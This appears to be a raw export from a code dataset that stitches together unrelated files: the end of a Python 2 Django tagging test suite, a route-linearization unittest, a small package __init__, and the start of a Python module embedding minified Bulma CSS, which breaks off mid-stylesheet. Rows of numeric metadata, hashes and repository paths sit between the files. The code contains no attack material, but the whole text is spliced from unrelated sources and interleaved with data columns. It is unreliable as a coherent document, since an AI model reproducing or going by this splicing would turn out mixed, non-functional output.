                          u'foo %s:%s=%s bar' % (w50, w50, w50))
        # Name part exceeding MAX_TAG_NAME_LENGTH must raise.
        try:
            t.clean('foo %s bar' % w51)
        except forms.ValidationError, ve:
            self.assertEquals(unicode(list(ve.messages)), u'[u"Each tag\'s name may be no more than 50 characters long."]')
        except Exception, e:
            raise e
        else:
            raise self.failureException('a ValidationError exception was supposed to have been raised.')
        # Namespace part exceeding MAX_TAG_NAMESPACE_LENGTH must raise.
        try:
            t.clean('foo %s:%s bar' % (w51, w50))
        except forms.ValidationError, ve:
            self.assertEquals(unicode(list(ve.messages)), u'[u"Each tag\'s namespace may be no more than 50 characters long."]')
        except Exception, e:
            raise e
        else:
            raise self.failureException('a ValidationError exception was supposed to have been raised.')
        # Value part exceeding MAX_TAG_VALUE_LENGTH must raise.
        try:
            t.clean('foo %s=%s bar' % (w50, w51))
        except forms.ValidationError, ve:
            self.assertEquals(unicode(list(ve.messages)), u'[u"Each tag\'s value may be no more than 50 characters long."]')
        except Exception, e:
            raise e
        else:
            raise self.failureException('a ValidationError exception was supposed to have been raised.')
        # Shrink the whole-tag limit below namespace+name+value (+2
        # separator chars) so the combined tag now fails.
        conf.MAX_TAG_LENGTH = 149
        try:
            t.clean('foo %s:%s=%s bar' % (w50, w50, w50))
        except forms.ValidationError, ve:
            self.assertEquals(unicode(list(ve.messages)), u"[u'Each tag may be no more than 149 characters long.']")
        except Exception, e:
            raise e
        else:
            raise self.failureException('a ValidationError exception was supposed to have been raised.')
    def test_tag_d_validation_with_non_string_input(self):
        # Tag instances are accepted and rendered to their edit-string
        # form, quoting namespaces that contain a colon.
        t = TagField()
        self.assertEquals(t.clean(Tag(name='foo')), 'foo')
        self.assertEquals(t.clean(Tag(name='foo', namespace='bar')), 'bar:foo')
        self.assertEquals(t.clean(Tag(name='foo', namespace='bar:baz')), '"bar:baz":foo')
    def test_tag_d_validation_with_empty_input(self):
        # Empty input is rejected when required, normalised to '' otherwise.
        t = TagField()
        self.assertRaises(forms.ValidationError, t.clean, '')
        t = TagField(required=False)
        self.assertEquals(t.clean(''), '')
        self.assertEquals(t.clean(None), '')
    def test_tag_d_validation_with_default_namespace(self):
        # The default namespace itself is validated against
        # MAX_TAG_NAMESPACE_LENGTH even though it is not typed by the user.
        t = TagField(default_namespace='foo')
        self.assertEquals(t.clean('bar'), 'bar')
        conf.MAX_TAG_NAMESPACE_LENGTH = 10
        t = TagField(default_namespace='qwertyuiop')
        self.assertEquals(t.clean('bar'), 'bar')
        t = TagField(default_namespace='qwertyuiopa')
        self.assertRaises(forms.ValidationError, t.clean, 'bar')
#########
# Admin #
#########
class TestTagAdminForm(TestCase):
    """Tests for ``TagAdminForm`` field validation: per-field length
    limits, the whole-tag length check (surfaced as a non-field error),
    and rejection of invalid characters such as double quotes.
    """
    def setUp(self):
        # Remember the configured length limits so individual tests may
        # mutate them freely; tearDown restores the originals.
        self.original_max_tag_length = conf.MAX_TAG_LENGTH
        self.original_max_tag_name_length = conf.MAX_TAG_NAME_LENGTH
        self.original_max_tag_namespace_length = conf.MAX_TAG_NAMESPACE_LENGTH
        self.original_max_tag_value_length = conf.MAX_TAG_VALUE_LENGTH
    def tearDown(self):
        # Restore the limits saved in setUp so tests remain independent.
        conf.MAX_TAG_LENGTH = self.original_max_tag_length
        conf.MAX_TAG_NAME_LENGTH = self.original_max_tag_name_length
        conf.MAX_TAG_NAMESPACE_LENGTH = self.original_max_tag_namespace_length
        conf.MAX_TAG_VALUE_LENGTH = self.original_max_tag_value_length
    def test_form_fields_validation(self):
        """Walk name/namespace/value through lengths around the
        configured limits and assert which fields carry errors."""
        w50 = 'qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvb'  # exactly 50 chars
        w51 = w50 + 'n'  # one over 50
        w30 = w50[:30]  # exactly at the 30-char per-part limit below
        w31 = w50[:31]  # one over 30
        conf.MAX_TAG_LENGTH = 90
        conf.MAX_TAG_NAME_LENGTH = 30
        conf.MAX_TAG_NAMESPACE_LENGTH = 30
        conf.MAX_TAG_VALUE_LENGTH = 30
        # All parts empty: only the (required) name field errors.
        tag_parts = {'name': None, 'namespace': None, 'value': None}
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 1)
        self.assertEquals(len(f['name'].errors), 1)
        # A name at the limit is valid.
        tag_parts['name'] = w30
        f = TagAdminForm(tag_parts)
        self.failUnless(f.is_valid())
        # A namespace at the limit is valid.
        tag_parts['namespace'] = w30
        f = TagAdminForm(tag_parts)
        self.failUnless(f.is_valid())
        # A namespace one over the limit errors on that field only.
        tag_parts['namespace'] = w31
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 1)
        self.assertEquals(len(f['namespace'].errors), 1)
        # Missing name plus too-long namespace: two field errors.
        tag_parts['name'] = None
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 2)
        self.assertEquals(len(f['name'].errors), 1)
        self.assertEquals(len(f['namespace'].errors), 1)
        # Too-long name plus too-long namespace: still two field errors.
        tag_parts['name'] = w31
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 2)
        self.assertEquals(len(f['name'].errors), 1)
        self.assertEquals(len(f['namespace'].errors), 1)
        # All three parts exactly at the limit: valid.
        tag_parts['name'] = w30
        tag_parts['namespace'] = w30
        tag_parts['value'] = w30
        f = TagAdminForm(tag_parts)
        self.failUnless(f.is_valid())
        # Value without a name: only the name field errors.
        tag_parts['name'] = None
        tag_parts['namespace'] = None
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 1)
        self.assertEquals(len(f['name'].errors), 1)
        # All three parts one over the limit: three field errors.
        tag_parts['name'] = w31
        tag_parts['namespace'] = w31
        tag_parts['value'] = w31
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 3)
        self.assertEquals(len(f['namespace'].errors), 1)
        self.assertEquals(len(f['name'].errors), 1)
        self.assertEquals(len(f['value'].errors), 1)
        # Whole-tag limit just below namespace+name+value: the parts are
        # individually fine, so the error is a single non-field error.
        conf.MAX_TAG_LENGTH = 89
        tag_parts['name'] = w30
        tag_parts['namespace'] = w30
        tag_parts['value'] = w30
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 1)
        self.assertEquals(len(f['namespace'].errors), 0)
        self.assertEquals(len(f['name'].errors), 0)
        self.assertEquals(len(f['value'].errors), 0)
        self.assertEquals(len(f.non_field_errors()), 1)
        # more than 50 chars are not allowed because the model fields
        # cannot store longer values, even when conf allows 60.
        conf.MAX_TAG_LENGTH = 180
        conf.MAX_TAG_NAMESPACE_LENGTH = 60
        conf.MAX_TAG_NAME_LENGTH = 60
        conf.MAX_TAG_VALUE_LENGTH = 60
        tag_parts['name'] = w50
        tag_parts['namespace'] = w50
        tag_parts['value'] = w50
        f = TagAdminForm(tag_parts)
        self.failUnless(f.is_valid())
        tag_parts['name'] = w51
        tag_parts['namespace'] = w51
        tag_parts['value'] = w51
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 3)
        self.assertEquals(len(f['namespace'].errors), 1)
        self.assertEquals(len(f['name'].errors), 1)
        self.assertEquals(len(f['value'].errors), 1)
        self.assertEquals(len(f.non_field_errors()), 0)
    def test_form_fields_validation_with_invalid_input(self):
        """Double quotes are rejected in every part, whether embedded,
        standalone, or wrapping the whole part."""
        tag_parts = {'namespace': None, 'name': 'foo', 'value': None}
        f = TagAdminForm(tag_parts)
        self.failUnless(f.is_valid())
        # A lone double quote as the name.
        tag_parts['name'] = '"'
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 1)
        self.assertEquals(len(f['name'].errors), 1)
        # Embedded double quote in all three parts.
        tag_parts['name'] = 'foo"bar'
        tag_parts['namespace'] = 'foo"bar'
        tag_parts['value'] = 'foo"bar'
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 3)
        self.assertEquals(len(f['namespace'].errors), 1)
        self.assertEquals(len(f['name'].errors), 1)
        self.assertEquals(len(f['value'].errors), 1)
        # Fully quoted parts are also invalid.
        tag_parts['name'] = '"foo"'
        tag_parts['namespace'] = '"foo"'
        tag_parts['value'] = '"foo"'
        f = TagAdminForm(tag_parts)
        self.failIf(f.is_valid())
        self.assertEquals(len(f.errors), 3)
        self.assertEquals(len(f['namespace'].errors), 1)
        self.assertEquals(len(f['name'].errors), 1)
        self.assertEquals(len(f['value'].errors), 1)
###########
# Generic #
###########
class TestFetchContentObjects(TestCase):
    """Tests for fetch_content_objects(): prefetching the generic
    content objects of TaggedItem querysets must resolve the same set of
    objects as lazy per-item access."""
    def setUp(self):
        # Parrots (with perches) tagged in various overlapping ways.
        for state, size, smelly, tag_string in (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'bar baz ter'),
            ('no more', 4, True, 'foo ter spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        ):
            bird = Parrot.objects.create(
                state=state,
                perch=Perch.objects.create(size=size, smelly=smelly),
            )
            Tag.objects.update_tags(bird, tag_string)
        # A couple of tagged articles...
        for title, tag_string in (
            ('beatles comeback!', 'foo bar ter'),
            ('django gets a new pony', 'spam:foo spam:egg=ham'),
        ):
            Tag.objects.update_tags(Article.objects.create(name=title), tag_string)
        # ...and tagged links, so several content types are involved.
        for title, tag_string in (
            ('example.com', 'baz ter'),
            ('lolcatz', 'baz'),
        ):
            Tag.objects.update_tags(Link.objects.create(name=title), tag_string)
        self.parrot_contenttype = ContentType.objects.get_for_model(Parrot)
        self.article_contenttype = ContentType.objects.get_for_model(Article)
        self.link_contenttype = ContentType.objects.get_for_model(Link)
    def _check_prefetch(self, queryset, **fetch_kwargs):
        # Resolve content objects lazily and after bulk prefetching;
        # both paths must yield the same set of objects.
        lazy_items = queryset
        prefetched_items = queryset
        fetch_content_objects(prefetched_items, **fetch_kwargs)
        self.assertEquals(
            set(item.object for item in lazy_items),
            set(item.object for item in prefetched_items),
        )
    def test_with_one_model(self):
        self._check_prefetch(
            TaggedItem.objects.filter(content_type=self.parrot_contenttype))
    def test_select_related_for(self):
        self._check_prefetch(
            TaggedItem.objects.all(), select_related_for=["parrot"])
    def test_with_many_models(self):
        self._check_prefetch(TaggedItem.objects.all())
| 47.227927
| 153
| 0.640941
| 16,077
| 121,423
| 4.641351
| 0.032593
| 0.108927
| 0.071483
| 0.049317
| 0.887669
| 0.849663
| 0.815382
| 0.785484
| 0.750466
| 0.72708
| 0
| 0.013245
| 0.225863
| 121,423
| 2,570
| 154
| 47.246304
| 0.780591
| 0.013251
| 0
| 0.600376
| 0
| 0.001881
| 0.094929
| 0.001948
| 0
| 0
| 0
| 0
| 0.244946
| 0
| null | null | 0.013164
| 0.007052
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
217c8717dfde93c84dd723881a6af93563857926
| 141
|
py
|
Python
|
src/__init__.py
|
Jammy2211/Probabilistic_Programming_CDT
|
9d765dbc1aca38b20076a3e650f231f144c937d3
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
Jammy2211/Probabilistic_Programming_CDT
|
9d765dbc1aca38b20076a3e650f231f144c937d3
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
Jammy2211/Probabilistic_Programming_CDT
|
9d765dbc1aca38b20076a3e650f231f144c937d3
|
[
"MIT"
] | null | null | null |
from src import light_profiles as lp
from src import mass_profiles as mp
from src.galaxy import Galaxy
from src.analysis import Analysis
| 28.2
| 37
| 0.815603
| 24
| 141
| 4.708333
| 0.458333
| 0.247788
| 0.230089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 141
| 4
| 38
| 35.25
| 0.965812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2181b036139bf58359c345c56560c61416772fe6
| 2,204
|
py
|
Python
|
tests/test_route_linearization.py
|
jlieberherr/python-playground
|
6338b5878c0dba588768bd1c530add951420d858
|
[
"Unlicense"
] | null | null | null |
tests/test_route_linearization.py
|
jlieberherr/python-playground
|
6338b5878c0dba588768bd1c530add951420d858
|
[
"Unlicense"
] | null | null | null |
tests/test_route_linearization.py
|
jlieberherr/python-playground
|
6338b5878c0dba588768bd1c530add951420d858
|
[
"Unlicense"
] | null | null | null |
import unittest
from scripts.route_linearization import linearize_stops_in_multiple_routes
class RouteAggregationTest(unittest.TestCase):
    """Tests for linearize_stops_in_multiple_routes(): stops in a
    successor graph must be assigned sort indices consistent with the
    graph's ordering constraints."""

    def test_linearize_multiple_routes_trivial_graph(self):
        # A single stop with no successors gets index 1.
        order = linearize_stops_in_multiple_routes({1: set()})
        self.assertEquals({1: 1}, order)

    def test_linearize_multiple_routes_almost_trivial_graph(self):
        # A two-stop chain is numbered in succession.
        order = linearize_stops_in_multiple_routes({1: {2}, 2: set()})
        self.assertEquals({1: 1, 2: 2}, order)

    def test_linearize_multiple_routes_non_trivial_graph(self):
        order = linearize_stops_in_multiple_routes(
            {1: {2}, 2: {3}, 3: {4, 7}, 4: set(), 5: {6}, 6: {2}, 7: set()}
        )
        # Successors must come strictly after their predecessors.
        for later, earlier in ((2, 1), (2, 6), (4, 3), (7, 3)):
            self.assertTrue(order[later] > order[earlier])
        # These pairs must be numbered consecutively.
        for stop, predecessor in ((6, 5), (3, 2)):
            self.assertTrue(order[stop] == (order[predecessor] + 1))

    def test_linearize_multiple_routes_non_trivial_graph_extended(self):
        order = linearize_stops_in_multiple_routes(
            {1: {2}, 2: {3}, 3: {4, 7}, 4: set(), 5: {6}, 6: {2}, 7: {9}, 8: {7}, 9: {10}, 10: set()}
        )
        # Successors must come strictly after their predecessors.
        for later, earlier in ((2, 1), (2, 6), (4, 3), (7, 3), (7, 8)):
            self.assertTrue(order[later] > order[earlier])
        # These pairs must be numbered consecutively.
        for stop, predecessor in ((6, 5), (3, 2), (9, 7), (10, 9)):
            self.assertTrue(order[stop] == (order[predecessor] + 1))
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 50.090909
| 101
| 0.700544
| 339
| 2,204
| 4.079646
| 0.123894
| 0.234273
| 0.312364
| 0.416486
| 0.898771
| 0.808388
| 0.786696
| 0.764281
| 0.707881
| 0.654375
| 0
| 0.044335
| 0.171053
| 2,204
| 43
| 102
| 51.255814
| 0.712644
| 0
| 0
| 0.411765
| 0
| 0
| 0.00363
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.205882
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2183456179085f89f3812890da91022fb21b253f
| 96
|
py
|
Python
|
trompet/listeners/__init__.py
|
aether-space/trompet
|
7c0b8576782a790ae6623ab4f930f43174e5559d
|
[
"BSD-3-Clause"
] | null | null | null |
trompet/listeners/__init__.py
|
aether-space/trompet
|
7c0b8576782a790ae6623ab4f930f43174e5559d
|
[
"BSD-3-Clause"
] | null | null | null |
trompet/listeners/__init__.py
|
aether-space/trompet
|
7c0b8576782a790ae6623ab4f930f43174e5559d
|
[
"BSD-3-Clause"
] | null | null | null |
from trompet.listeners._registry import registry
from trompet.listeners import webhook, xmlrpc
| 24
| 48
| 0.854167
| 12
| 96
| 6.75
| 0.583333
| 0.271605
| 0.493827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 96
| 3
| 49
| 32
| 0.94186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21abc46cfc48ab56a01fbe79f51382971ccc30a8
| 196,818
|
py
|
Python
|
htbulma/__init__.py
|
manatlan/htbulma
|
d756a62ad9781bb6842d6bf49bdb065941dfb7d2
|
[
"MIT"
] | null | null | null |
htbulma/__init__.py
|
manatlan/htbulma
|
d756a62ad9781bb6842d6bf49bdb065941dfb7d2
|
[
"MIT"
] | null | null | null |
htbulma/__init__.py
|
manatlan/htbulma
|
d756a62ad9781bb6842d6bf49bdb065941dfb7d2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# #############################################################################
# Copyright (C) 2022 manatlan manatlan[at]gmail(dot)com
#
# MIT licence
#
# https://github.com/manatlan/htbulma
# #############################################################################
from htag import Tag
__version__="0.5.0"
# css=Tag.H.link( _href="https://cdn.jsdelivr.net/npm/bulma@0.8.2/css/bulma.min.css",_rel="stylesheet")
css= Tag.H.style( r"""/*! bulma.io v0.8.2 | MIT License | github.com/jgthms/bulma */@-webkit-keyframes spinAround{from{transform:rotate(0)}to{transform:rotate(359deg)}}@keyframes spinAround{from{transform:rotate(0)}to{transform:rotate(359deg)}}.breadcrumb,.button,.delete,.file,.is-unselectable,.modal-close,.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous,.tabs{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.navbar-link:not(.is-arrowless)::after,.select:not(.is-multiple):not(.is-loading)::after{border:3px solid transparent;border-radius:2px;border-right:0;border-top:0;content:" ";display:block;height:.625em;margin-top:-.4375em;pointer-events:none;position:absolute;top:50%;transform:rotate(-45deg);transform-origin:center;width:.625em}.block:not(:last-child),.box:not(:last-child),.breadcrumb:not(:last-child),.content:not(:last-child),.highlight:not(:last-child),.level:not(:last-child),.list:not(:last-child),.message:not(:last-child),.notification:not(:last-child),.pagination:not(:last-child),.progress:not(:last-child),.subtitle:not(:last-child),.table-container:not(:last-child),.table:not(:last-child),.tabs:not(:last-child),.title:not(:last-child){margin-bottom:1.5rem}.delete,.modal-close{-moz-appearance:none;-webkit-appearance:none;background-color:rgba(10,10,10,.2);border:none;border-radius:290486px;cursor:pointer;pointer-events:auto;display:inline-block;flex-grow:0;flex-shrink:0;font-size:0;height:20px;max-height:20px;max-width:20px;min-height:20px;min-width:20px;outline:0;position:relative;vertical-align:top;width:20px}.delete::after,.delete::before,.modal-close::after,.modal-close::before{background-color:#fff;content:"";display:block;left:50%;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%) rotate(45deg);transform-origin:center 
center}.delete::before,.modal-close::before{height:2px;width:50%}.delete::after,.modal-close::after{height:50%;width:2px}.delete:focus,.delete:hover,.modal-close:focus,.modal-close:hover{background-color:rgba(10,10,10,.3)}.delete:active,.modal-close:active{background-color:rgba(10,10,10,.4)}.is-small.delete,.is-small.modal-close{height:16px;max-height:16px;max-width:16px;min-height:16px;min-width:16px;width:16px}.is-medium.delete,.is-medium.modal-close{height:24px;max-height:24px;max-width:24px;min-height:24px;min-width:24px;width:24px}.is-large.delete,.is-large.modal-close{height:32px;max-height:32px;max-width:32px;min-height:32px;min-width:32px;width:32px}.button.is-loading::after,.control.is-loading::after,.loader,.select.is-loading::after{-webkit-animation:spinAround .5s infinite linear;animation:spinAround .5s infinite linear;border:2px solid #dbdbdb;border-radius:290486px;border-right-color:transparent;border-top-color:transparent;content:"";display:block;height:1em;position:relative;width:1em}.hero-video,.image.is-16by9 .has-ratio,.image.is-16by9 img,.image.is-1by1 .has-ratio,.image.is-1by1 img,.image.is-1by2 .has-ratio,.image.is-1by2 img,.image.is-1by3 .has-ratio,.image.is-1by3 img,.image.is-2by1 .has-ratio,.image.is-2by1 img,.image.is-2by3 .has-ratio,.image.is-2by3 img,.image.is-3by1 .has-ratio,.image.is-3by1 img,.image.is-3by2 .has-ratio,.image.is-3by2 img,.image.is-3by4 .has-ratio,.image.is-3by4 img,.image.is-3by5 .has-ratio,.image.is-3by5 img,.image.is-4by3 .has-ratio,.image.is-4by3 img,.image.is-4by5 .has-ratio,.image.is-4by5 img,.image.is-5by3 .has-ratio,.image.is-5by3 img,.image.is-5by4 .has-ratio,.image.is-5by4 img,.image.is-9by16 .has-ratio,.image.is-9by16 img,.image.is-square .has-ratio,.image.is-square img,.is-overlay,.modal,.modal-background{bottom:0;left:0;position:absolute;right:0;top:0}.button,.file-cta,.file-name,.input,.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous,.select 
select,.textarea{-moz-appearance:none;-webkit-appearance:none;align-items:center;border:1px solid transparent;border-radius:4px;box-shadow:none;display:inline-flex;font-size:1rem;height:2.5em;justify-content:flex-start;line-height:1.5;padding-bottom:calc(.5em - 1px);padding-left:calc(.75em - 1px);padding-right:calc(.75em - 1px);padding-top:calc(.5em - 1px);position:relative;vertical-align:top}.button:active,.button:focus,.file-cta:active,.file-cta:focus,.file-name:active,.file-name:focus,.input:active,.input:focus,.is-active.button,.is-active.file-cta,.is-active.file-name,.is-active.input,.is-active.pagination-ellipsis,.is-active.pagination-link,.is-active.pagination-next,.is-active.pagination-previous,.is-active.textarea,.is-focused.button,.is-focused.file-cta,.is-focused.file-name,.is-focused.input,.is-focused.pagination-ellipsis,.is-focused.pagination-link,.is-focused.pagination-next,.is-focused.pagination-previous,.is-focused.textarea,.pagination-ellipsis:active,.pagination-ellipsis:focus,.pagination-link:active,.pagination-link:focus,.pagination-next:active,.pagination-next:focus,.pagination-previous:active,.pagination-previous:focus,.select select.is-active,.select select.is-focused,.select select:active,.select select:focus,.textarea:active,.textarea:focus{outline:0}.button[disabled],.file-cta[disabled],.file-name[disabled],.input[disabled],.pagination-ellipsis[disabled],.pagination-link[disabled],.pagination-next[disabled],.pagination-previous[disabled],.select fieldset[disabled] select,.select select[disabled],.textarea[disabled],fieldset[disabled] .button,fieldset[disabled] .file-cta,fieldset[disabled] .file-name,fieldset[disabled] .input,fieldset[disabled] .pagination-ellipsis,fieldset[disabled] .pagination-link,fieldset[disabled] .pagination-next,fieldset[disabled] .pagination-previous,fieldset[disabled] .select select,fieldset[disabled] .textarea{cursor:not-allowed}/*! 
minireset.css v0.0.6 | MIT License | github.com/jgthms/minireset.css */blockquote,body,dd,dl,dt,fieldset,figure,h1,h2,h3,h4,h5,h6,hr,html,iframe,legend,li,ol,p,pre,textarea,ul{margin:0;padding:0}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:400}ul{list-style:none}button,input,select,textarea{margin:0}html{box-sizing:border-box}*,::after,::before{box-sizing:inherit}img,video{height:auto;max-width:100%}iframe{border:0}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}td:not([align]),th:not([align]){text-align:left}html{background-color:#fff;font-size:16px;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;min-width:300px;overflow-x:hidden;overflow-y:scroll;text-rendering:optimizeLegibility;-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;-ms-text-size-adjust:100%;text-size-adjust:100%}article,aside,figure,footer,header,hgroup,section{display:block}body,button,input,select,textarea{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif}code,pre{-moz-osx-font-smoothing:auto;-webkit-font-smoothing:auto;font-family:monospace}body{color:#4a4a4a;font-size:1em;font-weight:400;line-height:1.5}a{color:#3273dc;cursor:pointer;text-decoration:none}a strong{color:currentColor}a:hover{color:#363636}code{background-color:#f5f5f5;color:#f14668;font-size:.875em;font-weight:400;padding:.25em .5em .25em}hr{background-color:#f5f5f5;border:none;display:block;height:2px;margin:1.5rem 0}img{height:auto;max-width:100%}input[type=checkbox],input[type=radio]{vertical-align:baseline}small{font-size:.875em}span{font-style:inherit;font-weight:inherit}strong{color:#363636;font-weight:700}fieldset{border:none}pre{-webkit-overflow-scrolling:touch;background-color:#f5f5f5;color:#4a4a4a;font-size:.875em;overflow-x:auto;padding:1.25rem 1.5rem;white-space:pre;word-wrap:normal}pre code{background-color:transparent;color:currentColor;font-size:1em;padding:0}table 
td,table th{vertical-align:top}table td:not([align]),table th:not([align]){text-align:left}table th{color:#363636}.is-clearfix::after{clear:both;content:" ";display:table}.is-pulled-left{float:left!important}.is-pulled-right{float:right!important}.is-clipped{overflow:hidden!important}.is-size-1{font-size:3rem!important}.is-size-2{font-size:2.5rem!important}.is-size-3{font-size:2rem!important}.is-size-4{font-size:1.5rem!important}.is-size-5{font-size:1.25rem!important}.is-size-6{font-size:1rem!important}.is-size-7{font-size:.75rem!important}@media screen and (max-width:768px){.is-size-1-mobile{font-size:3rem!important}.is-size-2-mobile{font-size:2.5rem!important}.is-size-3-mobile{font-size:2rem!important}.is-size-4-mobile{font-size:1.5rem!important}.is-size-5-mobile{font-size:1.25rem!important}.is-size-6-mobile{font-size:1rem!important}.is-size-7-mobile{font-size:.75rem!important}}@media screen and (min-width:769px),print{.is-size-1-tablet{font-size:3rem!important}.is-size-2-tablet{font-size:2.5rem!important}.is-size-3-tablet{font-size:2rem!important}.is-size-4-tablet{font-size:1.5rem!important}.is-size-5-tablet{font-size:1.25rem!important}.is-size-6-tablet{font-size:1rem!important}.is-size-7-tablet{font-size:.75rem!important}}@media screen and (max-width:1023px){.is-size-1-touch{font-size:3rem!important}.is-size-2-touch{font-size:2.5rem!important}.is-size-3-touch{font-size:2rem!important}.is-size-4-touch{font-size:1.5rem!important}.is-size-5-touch{font-size:1.25rem!important}.is-size-6-touch{font-size:1rem!important}.is-size-7-touch{font-size:.75rem!important}}@media screen and (min-width:1024px){.is-size-1-desktop{font-size:3rem!important}.is-size-2-desktop{font-size:2.5rem!important}.is-size-3-desktop{font-size:2rem!important}.is-size-4-desktop{font-size:1.5rem!important}.is-size-5-desktop{font-size:1.25rem!important}.is-size-6-desktop{font-size:1rem!important}.is-size-7-desktop{font-size:.75rem!important}}@media screen and 
(min-width:1216px){.is-size-1-widescreen{font-size:3rem!important}.is-size-2-widescreen{font-size:2.5rem!important}.is-size-3-widescreen{font-size:2rem!important}.is-size-4-widescreen{font-size:1.5rem!important}.is-size-5-widescreen{font-size:1.25rem!important}.is-size-6-widescreen{font-size:1rem!important}.is-size-7-widescreen{font-size:.75rem!important}}
/* Minified Bulma framework CSS (generated build artifact — presumably compiled from SCSS; edit the source, not this file).
   Above/below: .is-size-1..7 responsive font-size helpers at the widescreen (>=1216px) and fullhd (>=1408px) breakpoints. */
@media screen and (min-width:1408px){.is-size-1-fullhd{font-size:3rem!important}.is-size-2-fullhd{font-size:2.5rem!important}.is-size-3-fullhd{font-size:2rem!important}.is-size-4-fullhd{font-size:1.5rem!important}.is-size-5-fullhd{font-size:1.25rem!important}.is-size-6-fullhd{font-size:1rem!important}.is-size-7-fullhd{font-size:.75rem!important}}
/* .has-text-(centered|justified|left|right): text-alignment helpers, each repeated per breakpoint
   (-mobile <=768px, -tablet >=769px or print, -tablet-only 769–1023px, -touch <=1023px, -desktop >=1024px,
   -desktop-only 1024–1215px, -widescreen >=1216px, -widescreen-only 1216–1407px, -fullhd >=1408px). */
.has-text-centered{text-align:center!important}.has-text-justified{text-align:justify!important}.has-text-left{text-align:left!important}.has-text-right{text-align:right!important}@media screen and (max-width:768px){.has-text-centered-mobile{text-align:center!important}}@media screen and (min-width:769px),print{.has-text-centered-tablet{text-align:center!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-centered-tablet-only{text-align:center!important}}@media screen and (max-width:1023px){.has-text-centered-touch{text-align:center!important}}@media screen and (min-width:1024px){.has-text-centered-desktop{text-align:center!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-centered-desktop-only{text-align:center!important}}@media screen and (min-width:1216px){.has-text-centered-widescreen{text-align:center!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-centered-widescreen-only{text-align:center!important}}@media screen and (min-width:1408px){.has-text-centered-fullhd{text-align:center!important}}@media screen and (max-width:768px){.has-text-justified-mobile{text-align:justify!important}}@media screen and 
